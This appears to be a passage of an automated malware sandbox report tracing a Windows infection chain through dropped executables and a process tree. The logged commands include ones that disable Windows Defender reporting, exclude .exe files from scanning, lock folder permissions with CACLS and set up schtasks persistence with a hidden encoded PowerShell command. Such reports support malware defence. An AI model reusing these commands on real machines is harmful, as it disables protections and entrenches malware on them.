PID 2032 wrote to memory of 1936 N/A C:\Users\Admin\AppData\Local\Temp\f66b2258a70968303673ee418b5d5307.exe C:\Windows\Microsoft.NET\Framework\v4.0.30319\AppLaunch.exe
PID 2032 wrote to memory of 1936 N/A C:\Users\Admin\AppData\Local\Temp\f66b2258a70968303673ee418b5d5307.exe C:\Windows\Microsoft.NET\Framework\v4.0.30319\AppLaunch.exe
PID 2032 wrote to memory of 1936 N/A C:\Users\Admin\AppData\Local\Temp\f66b2258a70968303673ee418b5d5307.exe C:\Windows\Microsoft.NET\Framework\v4.0.30319\AppLaunch.exe
PID 2032 wrote to memory of 2584 N/A C:\Users\Admin\AppData\Local\Temp\f66b2258a70968303673ee418b5d5307.exe C:\Windows\Microsoft.NET\Framework\v4.0.30319\AppLaunch.exe
PID 2032 wrote to memory of 2584 N/A C:\Users\Admin\AppData\Local\Temp\f66b2258a70968303673ee418b5d5307.exe C:\Windows\Microsoft.NET\Framework\v4.0.30319\AppLaunch.exe
PID 2032 wrote to memory of 2584 N/A C:\Users\Admin\AppData\Local\Temp\f66b2258a70968303673ee418b5d5307.exe C:\Windows\Microsoft.NET\Framework\v4.0.30319\AppLaunch.exe
PID 2032 wrote to memory of 2584 N/A C:\Users\Admin\AppData\Local\Temp\f66b2258a70968303673ee418b5d5307.exe C:\Windows\Microsoft.NET\Framework\v4.0.30319\AppLaunch.exe
PID 2032 wrote to memory of 2584 N/A C:\Users\Admin\AppData\Local\Temp\f66b2258a70968303673ee418b5d5307.exe C:\Windows\Microsoft.NET\Framework\v4.0.30319\AppLaunch.exe
PID 2032 wrote to memory of 2584 N/A C:\Users\Admin\AppData\Local\Temp\f66b2258a70968303673ee418b5d5307.exe C:\Windows\Microsoft.NET\Framework\v4.0.30319\AppLaunch.exe
PID 3108 wrote to memory of 5000 N/A N/A C:\Users\Admin\AppData\Local\Temp\27C7.exe
PID 3108 wrote to memory of 5000 N/A N/A C:\Users\Admin\AppData\Local\Temp\27C7.exe
PID 3108 wrote to memory of 5000 N/A N/A C:\Users\Admin\AppData\Local\Temp\27C7.exe
PID 3108 wrote to memory of 5016 N/A N/A C:\Users\Admin\AppData\Local\Temp\28A2.exe
PID 3108 wrote to memory of 5016 N/A N/A C:\Users\Admin\AppData\Local\Temp\28A2.exe
PID 3108 wrote to memory of 5016 N/A N/A C:\Users\Admin\AppData\Local\Temp\28A2.exe
PID 3108 wrote to memory of 1768 N/A N/A C:\Windows\system32\cmd.exe
PID 3108 wrote to memory of 1768 N/A N/A C:\Windows\system32\cmd.exe
PID 5000 wrote to memory of 5008 N/A C:\Users\Admin\AppData\Local\Temp\27C7.exe C:\Users\Admin\AppData\Local\Temp\IXP000.TMP\ro3WO0Cp.exe
PID 5000 wrote to memory of 5008 N/A C:\Users\Admin\AppData\Local\Temp\27C7.exe C:\Users\Admin\AppData\Local\Temp\IXP000.TMP\ro3WO0Cp.exe
PID 5000 wrote to memory of 5008 N/A C:\Users\Admin\AppData\Local\Temp\27C7.exe C:\Users\Admin\AppData\Local\Temp\IXP000.TMP\ro3WO0Cp.exe
PID 3108 wrote to memory of 4612 N/A N/A C:\Users\Admin\AppData\Local\Temp\2A89.exe
PID 3108 wrote to memory of 4612 N/A N/A C:\Users\Admin\AppData\Local\Temp\2A89.exe
PID 3108 wrote to memory of 4612 N/A N/A C:\Users\Admin\AppData\Local\Temp\2A89.exe
PID 5008 wrote to memory of 3752 N/A C:\Users\Admin\AppData\Local\Temp\IXP000.TMP\ro3WO0Cp.exe C:\Users\Admin\AppData\Local\Temp\IXP001.TMP\dW9uy8Yx.exe
PID 5008 wrote to memory of 3752 N/A C:\Users\Admin\AppData\Local\Temp\IXP000.TMP\ro3WO0Cp.exe C:\Users\Admin\AppData\Local\Temp\IXP001.TMP\dW9uy8Yx.exe
PID 5008 wrote to memory of 3752 N/A C:\Users\Admin\AppData\Local\Temp\IXP000.TMP\ro3WO0Cp.exe C:\Users\Admin\AppData\Local\Temp\IXP001.TMP\dW9uy8Yx.exe
PID 3108 wrote to memory of 1268 N/A N/A C:\Users\Admin\AppData\Local\Temp\2B84.exe
PID 3108 wrote to memory of 1268 N/A N/A C:\Users\Admin\AppData\Local\Temp\2B84.exe
PID 3108 wrote to memory of 1268 N/A N/A C:\Users\Admin\AppData\Local\Temp\2B84.exe
PID 3752 wrote to memory of 992 N/A C:\Users\Admin\AppData\Local\Temp\IXP001.TMP\dW9uy8Yx.exe C:\Users\Admin\AppData\Local\Temp\IXP002.TMP\ni8Zb1nN.exe
PID 3752 wrote to memory of 992 N/A C:\Users\Admin\AppData\Local\Temp\IXP001.TMP\dW9uy8Yx.exe C:\Users\Admin\AppData\Local\Temp\IXP002.TMP\ni8Zb1nN.exe
PID 3752 wrote to memory of 992 N/A C:\Users\Admin\AppData\Local\Temp\IXP001.TMP\dW9uy8Yx.exe C:\Users\Admin\AppData\Local\Temp\IXP002.TMP\ni8Zb1nN.exe
PID 3108 wrote to memory of 552 N/A N/A C:\Users\Admin\AppData\Local\Temp\IXP004.TMP\2sA143dW.exe
PID 3108 wrote to memory of 552 N/A N/A C:\Users\Admin\AppData\Local\Temp\IXP004.TMP\2sA143dW.exe
PID 3108 wrote to memory of 552 N/A N/A C:\Users\Admin\AppData\Local\Temp\IXP004.TMP\2sA143dW.exe
PID 992 wrote to memory of 3960 N/A C:\Users\Admin\AppData\Local\Temp\IXP002.TMP\ni8Zb1nN.exe C:\Users\Admin\AppData\Local\Temp\IXP003.TMP\ZJ3VJ7hO.exe
PID 992 wrote to memory of 3960 N/A C:\Users\Admin\AppData\Local\Temp\IXP002.TMP\ni8Zb1nN.exe C:\Users\Admin\AppData\Local\Temp\IXP003.TMP\ZJ3VJ7hO.exe
PID 992 wrote to memory of 3960 N/A C:\Users\Admin\AppData\Local\Temp\IXP002.TMP\ni8Zb1nN.exe C:\Users\Admin\AppData\Local\Temp\IXP003.TMP\ZJ3VJ7hO.exe
PID 3108 wrote to memory of 2232 N/A N/A C:\Users\Admin\AppData\Local\Temp\2E26.exe
PID 3108 wrote to memory of 2232 N/A N/A C:\Users\Admin\AppData\Local\Temp\2E26.exe
PID 3108 wrote to memory of 2232 N/A N/A C:\Users\Admin\AppData\Local\Temp\2E26.exe
PID 3960 wrote to memory of 3648 N/A C:\Users\Admin\AppData\Local\Temp\IXP003.TMP\ZJ3VJ7hO.exe C:\Users\Admin\AppData\Local\Temp\IXP004.TMP\1Yv41KG8.exe
PID 3960 wrote to memory of 3648 N/A C:\Users\Admin\AppData\Local\Temp\IXP003.TMP\ZJ3VJ7hO.exe C:\Users\Admin\AppData\Local\Temp\IXP004.TMP\1Yv41KG8.exe
PID 3960 wrote to memory of 3648 N/A C:\Users\Admin\AppData\Local\Temp\IXP003.TMP\ZJ3VJ7hO.exe C:\Users\Admin\AppData\Local\Temp\IXP004.TMP\1Yv41KG8.exe

Uses Task Scheduler COM API

persistence

Processes

C:\Users\Admin\AppData\Local\Temp\f66b2258a70968303673ee418b5d5307.exe

"C:\Users\Admin\AppData\Local\Temp\f66b2258a70968303673ee418b5d5307.exe"

C:\Windows\Microsoft.NET\Framework\v4.0.30319\AppLaunch.exe

"C:\Windows\Microsoft.NET\Framework\v4.0.30319\AppLaunch.exe"

C:\Windows\Microsoft.NET\Framework\v4.0.30319\AppLaunch.exe

"C:\Windows\Microsoft.NET\Framework\v4.0.30319\AppLaunch.exe"

C:\Windows\Microsoft.NET\Framework\v4.0.30319\AppLaunch.exe

"C:\Windows\Microsoft.NET\Framework\v4.0.30319\AppLaunch.exe"

C:\Users\Admin\AppData\Local\Temp\27C7.exe

C:\Users\Admin\AppData\Local\Temp\27C7.exe

C:\Users\Admin\AppData\Local\Temp\28A2.exe

C:\Users\Admin\AppData\Local\Temp\28A2.exe

C:\Users\Admin\AppData\Local\Temp\IXP000.TMP\ro3WO0Cp.exe

C:\Users\Admin\AppData\Local\Temp\IXP000.TMP\ro3WO0Cp.exe

C:\Windows\system32\cmd.exe

C:\Windows\system32\cmd.exe /c ""C:\Users\Admin\AppData\Local\Temp\299D.bat" "

C:\Users\Admin\AppData\Local\Temp\2A89.exe

C:\Users\Admin\AppData\Local\Temp\2A89.exe

C:\Users\Admin\AppData\Local\Temp\IXP001.TMP\dW9uy8Yx.exe

C:\Users\Admin\AppData\Local\Temp\IXP001.TMP\dW9uy8Yx.exe

C:\Users\Admin\AppData\Local\Temp\2B84.exe

C:\Users\Admin\AppData\Local\Temp\2B84.exe

C:\Users\Admin\AppData\Local\Temp\IXP002.TMP\ni8Zb1nN.exe

C:\Users\Admin\AppData\Local\Temp\IXP002.TMP\ni8Zb1nN.exe

C:\Users\Admin\AppData\Local\Temp\2C6F.exe

C:\Users\Admin\AppData\Local\Temp\2C6F.exe

C:\Users\Admin\AppData\Local\Temp\IXP003.TMP\ZJ3VJ7hO.exe

C:\Users\Admin\AppData\Local\Temp\IXP003.TMP\ZJ3VJ7hO.exe

C:\Users\Admin\AppData\Local\Temp\IXP004.TMP\1Yv41KG8.exe

C:\Users\Admin\AppData\Local\Temp\IXP004.TMP\1Yv41KG8.exe

C:\Users\Admin\AppData\Local\Temp\2E26.exe

C:\Users\Admin\AppData\Local\Temp\2E26.exe

C:\Users\Admin\AppData\Local\Temp\fefffe8cea\explothe.exe

"C:\Users\Admin\AppData\Local\Temp\fefffe8cea\explothe.exe"

C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe

"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --single-argument https://www.facebook.com/login

C:\Windows\SysWOW64\schtasks.exe

"C:\Windows\System32\schtasks.exe" /Create /SC MINUTE /MO 1 /TN explothe.exe /TR "C:\Users\Admin\AppData\Local\Temp\fefffe8cea\explothe.exe" /F

C:\Windows\SysWOW64\WerFault.exe

C:\Windows\SysWOW64\WerFault.exe -pss -s 404 -p 2232 -ip 2232

C:\Windows\SysWOW64\cmd.exe

"C:\Windows\System32\cmd.exe" /k echo Y|CACLS "explothe.exe" /P "Admin:N"&&CACLS "explothe.exe" /P "Admin:R" /E&&echo Y|CACLS "..\fefffe8cea" /P "Admin:N"&&CACLS "..\fefffe8cea" /P "Admin:R" /E&&Exit

C:\Windows\SysWOW64\WerFault.exe

C:\Windows\SysWOW64\WerFault.exe -u -p 2232 -s 784

C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe

"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=crashpad-handler "--user-data-dir=C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data" /prefetch:7 --monitor-self-annotation=ptype=crashpad-handler "--database=C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Crashpad" "--metrics-dir=C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data" --annotation=IsOfficialBuild=1 --annotation=channel= --annotation=chromium-version=92.0.4515.131 "--annotation=exe=C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --annotation=plat=Win64 "--annotation=prod=Microsoft Edge" --annotation=ver=92.0.902.67 --initial-client-data=0x11c,0x120,0x124,0xf8,0x128,0x7ff9186a46f8,0x7ff9186a4708,0x7ff9186a4718

C:\Windows\SysWOW64\cmd.exe

C:\Windows\system32\cmd.exe /S /D /c" echo Y"

C:\Windows\SysWOW64\cacls.exe

CACLS "explothe.exe" /P "Admin:N"

C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe

"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=crashpad-handler "--user-data-dir=C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data" /prefetch:7 --monitor-self-annotation=ptype=crashpad-handler "--database=C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Crashpad" "--metrics-dir=C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data" --annotation=IsOfficialBuild=1 --annotation=channel= --annotation=chromium-version=92.0.4515.131 "--annotation=exe=C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --annotation=plat=Win64 "--annotation=prod=Microsoft Edge" --annotation=ver=92.0.902.67 --initial-client-data=0xfc,0x100,0x104,0xd8,0x108,0x7ff9186a46f8,0x7ff9186a4708,0x7ff9186a4718

C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe

"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --single-argument https://accounts.google.com/

C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe

"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=gpu-process --field-trial-handle=2188,6309549801319667691,357503778357398726,131072 --gpu-preferences=UAAAAAAAAADgAAAQAAAAAAAAAAAAAAAAAABgAAAAAAAwAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAHgAAAAAAAAAeAAAAAAAAAAoAAAABAAAACAAAAAAAAAAKAAAAAAAAAAwAAAAAAAAADgAAAAAAAAAEAAAAAAAAAAAAAAADQAAABAAAAAAAAAAAQAAAA0AAAAQAAAAAAAAAAQAAAANAAAAEAAAAAAAAAAHAAAADQAAAAgAAAAAAAAACAAAAAAAAAA= --mojo-platform-channel-handle=2200 /prefetch:2

C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe

"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=utility --utility-sub-type=storage.mojom.StorageService --field-trial-handle=2188,6309549801319667691,357503778357398726,131072 --lang=en-US --service-sandbox-type=utility --mojo-platform-channel-handle=2552 /prefetch:8

C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe

"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=utility --utility-sub-type=network.mojom.NetworkService --field-trial-handle=2188,6309549801319667691,357503778357398726,131072 --lang=en-US --service-sandbox-type=none --mojo-platform-channel-handle=2252 /prefetch:3

C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe

"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=2188,6309549801319667691,357503778357398726,131072 --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=6 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=3240 /prefetch:1

C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe

"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=2188,6309549801319667691,357503778357398726,131072 --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=5 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=3248 /prefetch:1

C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe

"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=utility --utility-sub-type=network.mojom.NetworkService --field-trial-handle=1444,8481321920796835987,9831548453769713675,131072 --lang=en-US --service-sandbox-type=none --mojo-platform-channel-handle=2064 /prefetch:3

C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe

"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=2188,6309549801319667691,357503778357398726,131072 --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=7 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=4540 /prefetch:1

C:\Windows\System32\CompPkgSrv.exe

C:\Windows\System32\CompPkgSrv.exe -Embedding

C:\Windows\System32\CompPkgSrv.exe

C:\Windows\System32\CompPkgSrv.exe -Embedding

C:\Windows\SysWOW64\cacls.exe

CACLS "explothe.exe" /P "Admin:R" /E

C:\Windows\Microsoft.NET\Framework\v4.0.30319\AppLaunch.exe

"C:\Windows\Microsoft.NET\Framework\v4.0.30319\AppLaunch.exe"

C:\Users\Admin\AppData\Local\Temp\IXP004.TMP\2sA143dW.exe

C:\Users\Admin\AppData\Local\Temp\IXP004.TMP\2sA143dW.exe

C:\Windows\SysWOW64\WerFault.exe

C:\Windows\SysWOW64\WerFault.exe -pss -s 508 -p 4696 -ip 4696

C:\Windows\SysWOW64\WerFault.exe

C:\Windows\SysWOW64\WerFault.exe -u -p 4696 -s 540

C:\Windows\SysWOW64\cmd.exe

C:\Windows\system32\cmd.exe /S /D /c" echo Y"

C:\Windows\SysWOW64\cacls.exe

CACLS "..\fefffe8cea" /P "Admin:N"

C:\Windows\SysWOW64\cacls.exe

CACLS "..\fefffe8cea" /P "Admin:R" /E

C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe

"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=2188,6309549801319667691,357503778357398726,131072 --lang=en-US --disable-client-side-phishing-detection --instant-process --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=9 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=5288 /prefetch:1

C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe

"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=2188,6309549801319667691,357503778357398726,131072 --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=8 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=5264 /prefetch:1

C:\Program Files (x86)\Microsoft\Edge\Application\92.0.902.67\identity_helper.exe

"C:\Program Files (x86)\Microsoft\Edge\Application\92.0.902.67\identity_helper.exe" --type=utility --utility-sub-type=winrt_app_id.mojom.WinrtAppIdService --field-trial-handle=2188,6309549801319667691,357503778357398726,131072 --lang=en-US --service-sandbox-type=none --mojo-platform-channel-handle=5904 /prefetch:8

C:\Program Files (x86)\Microsoft\Edge\Application\92.0.902.67\identity_helper.exe

"C:\Program Files (x86)\Microsoft\Edge\Application\92.0.902.67\identity_helper.exe" --type=utility --utility-sub-type=winrt_app_id.mojom.WinrtAppIdService --field-trial-handle=2188,6309549801319667691,357503778357398726,131072 --lang=en-US --service-sandbox-type=none --mojo-platform-channel-handle=5904 /prefetch:8

C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe

"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=2188,6309549801319667691,357503778357398726,131072 --lang=en-US --disable-client-side-phishing-detection --instant-process --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=12 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=5584 /prefetch:1

C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe

"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=2188,6309549801319667691,357503778357398726,131072 --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=11 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=5920 /prefetch:1

C:\Users\Admin\AppData\Local\Temp\888B.exe

C:\Users\Admin\AppData\Local\Temp\888B.exe

C:\Users\Admin\AppData\Local\Temp\8B8A.exe

C:\Users\Admin\AppData\Local\Temp\8B8A.exe

C:\Users\Admin\AppData\Local\Temp\8D31.exe

C:\Users\Admin\AppData\Local\Temp\8D31.exe

C:\Users\Admin\AppData\Local\Temp\toolspub2.exe

"C:\Users\Admin\AppData\Local\Temp\toolspub2.exe"

C:\Users\Admin\AppData\Local\Temp\31839b57a4f11171d6abc8bbc4451ee4.exe

"C:\Users\Admin\AppData\Local\Temp\31839b57a4f11171d6abc8bbc4451ee4.exe"

C:\Windows\SysWOW64\WerFault.exe

C:\Windows\SysWOW64\WerFault.exe -pss -s 516 -p 1332 -ip 1332

C:\Users\Admin\AppData\Local\Temp\toolspub2.exe

"C:\Users\Admin\AppData\Local\Temp\toolspub2.exe"

C:\Users\Admin\AppData\Local\Temp\fefffe8cea\explothe.exe

C:\Users\Admin\AppData\Local\Temp\fefffe8cea\explothe.exe

C:\Users\Admin\AppData\Local\Temp\latestX.exe

"C:\Users\Admin\AppData\Local\Temp\latestX.exe"

C:\Users\Admin\AppData\Local\Temp\7zS9778.tmp\Install.exe

.\Install.exe

C:\Users\Admin\AppData\Local\Temp\kos4.exe

"C:\Users\Admin\AppData\Local\Temp\kos4.exe"

C:\Windows\SysWOW64\WerFault.exe

C:\Windows\SysWOW64\WerFault.exe -u -p 1332 -s 784

C:\Users\Admin\AppData\Local\Temp\setup.exe

"C:\Users\Admin\AppData\Local\Temp\setup.exe"

C:\Users\Admin\AppData\Local\Temp\A32B.exe

C:\Users\Admin\AppData\Local\Temp\A32B.exe

C:\Users\Admin\AppData\Local\Temp\7zS9AF3.tmp\Install.exe

.\Install.exe /MKdidA "385119" /S

C:\Users\Admin\AppData\Local\Temp\LzmwAqmV.exe

"C:\Users\Admin\AppData\Local\Temp\LzmwAqmV.exe"

C:\Users\Admin\AppData\Local\Temp\is-T4QSL.tmp\LzmwAqmV.tmp

"C:\Users\Admin\AppData\Local\Temp\is-T4QSL.tmp\LzmwAqmV.tmp" /SL5="$801F4,6502186,54272,C:\Users\Admin\AppData\Local\Temp\LzmwAqmV.exe"

C:\Windows\SysWOW64\forfiles.exe

"C:\Windows\System32\forfiles.exe" /p c:\windows\system32 /m cmd.exe /c "cmd /C REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Extensions\" /f /v \"exe\" /t REG_SZ /d 0 /reg:32&REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Extensions\" /f /v \"exe\" /t REG_SZ /d 0 /reg:64&"

C:\Windows\SysWOW64\forfiles.exe

"C:\Windows\System32\forfiles.exe" /p c:\windows\system32 /m cmd.exe /c "cmd /C REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Spynet\" /f /v \"SpyNetReporting\" /t REG_DWORD /d 0 /reg:32&REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Spynet\" /f /v \"SpyNetReporting\" /t REG_DWORD /d 0 /reg:64&"

C:\Windows\SysWOW64\cmd.exe

/C REG ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Extensions" /f /v "exe" /t REG_SZ /d 0 /reg:32&REG ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Extensions" /f /v "exe" /t REG_SZ /d 0 /reg:64&

C:\Windows\SysWOW64\cmd.exe

/C REG ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Spynet" /f /v "SpyNetReporting" /t REG_DWORD /d 0 /reg:32&REG ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Spynet" /f /v "SpyNetReporting" /t REG_DWORD /d 0 /reg:64&

C:\Windows\SysWOW64\schtasks.exe

schtasks /CREATE /TN "gUBWoeRSz" /SC once /ST 02:36:26 /F /RU "Admin" /TR "powershell -WindowStyle Hidden -EncodedCommand cwB0AGEAcgB0AC0AcAByAG8AYwBlAHMAcwAgAC0AVwBpAG4AZABvAHcAUwB0AHkAbABlACAASABpAGQAZABlAG4AIABnAHAAdQBwAGQAYQB0AGUALgBlAHgAZQAgAC8AZgBvAHIAYwBlAA=="

\??\c:\windows\SysWOW64\reg.exe

REG ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Spynet" /f /v "SpyNetReporting" /t REG_DWORD /d 0 /reg:32

\??\c:\windows\SysWOW64\reg.exe

REG ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Extensions" /f /v "exe" /t REG_SZ /d 0 /reg:32

C:\Program Files (x86)\Drive Tools\zDriveTools.exe

"C:\Program Files (x86)\Drive Tools\zDriveTools.exe" -i

C:\Windows\SysWOW64\schtasks.exe

"C:\Windows\system32\schtasks.exe" /Delete /F /TN "Z1026-1"

\??\c:\windows\SysWOW64\reg.exe

REG ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Spynet" /f /v "SpyNetReporting" /t REG_DWORD /d 0 /reg:64

C:\Program Files (x86)\Drive Tools\zDriveTools.exe

"C:\Program Files (x86)\Drive Tools\zDriveTools.exe" -s

C:\Windows\SysWOW64\schtasks.exe

"C:\Windows\system32\schtasks.exe" /Query

\??\c:\windows\SysWOW64\reg.exe

REG ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Extensions" /f /v "exe" /t REG_SZ /d 0 /reg:64

C:\Windows\SysWOW64\schtasks.exe

schtasks /run /I /tn "gUBWoeRSz"

C:\Windows\SysWOW64\WerFault.exe

C:\Windows\SysWOW64\WerFault.exe -pss -s 516 -p 5136 -ip 5136

C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe

"C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe"

C:\Windows\SysWOW64\WerFault.exe

C:\Windows\SysWOW64\WerFault.exe -u -p 5136 -s 572

C:\Windows\System32\WindowsPowerShell\v1.0\powershell.EXE

C:\Windows\System32\WindowsPowerShell\v1.0\powershell.EXE -WindowStyle Hidden -EncodedCommand cwB0AGEAcgB0AC0AcAByAG8AYwBlAHMAcwAgAC0AVwBpAG4AZABvAHcAUwB0AHkAbABlACAASABpAGQAZABlAG4AIABnAHAAdQBwAGQAYQB0AGUALgBlAHgAZQAgAC8AZgBvAHIAYwBlAA==

C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe

powershell -nologo -noprofile

C:\Windows\SysWOW64\rundll32.exe

"C:\Windows\System32\rundll32.exe" C:\Users\Admin\AppData\Roaming\006700e5a2ab05\clip64.dll, Main

C:\Users\Admin\AppData\Local\Temp\A62.exe

C:\Users\Admin\AppData\Local\Temp\A62.exe

Network


Files

SHA512 3ea08f0897c1b7b5859961351eef59840bbf319a6ad7ebe1c9e1b5e2ce25588d7b1a37fd6c5417653521fc73f1f42eb043d0ee6fcd645aa92b8f305d726273b4

memory/5728-598-0x0000000000400000-0x0000000000636000-memory.dmp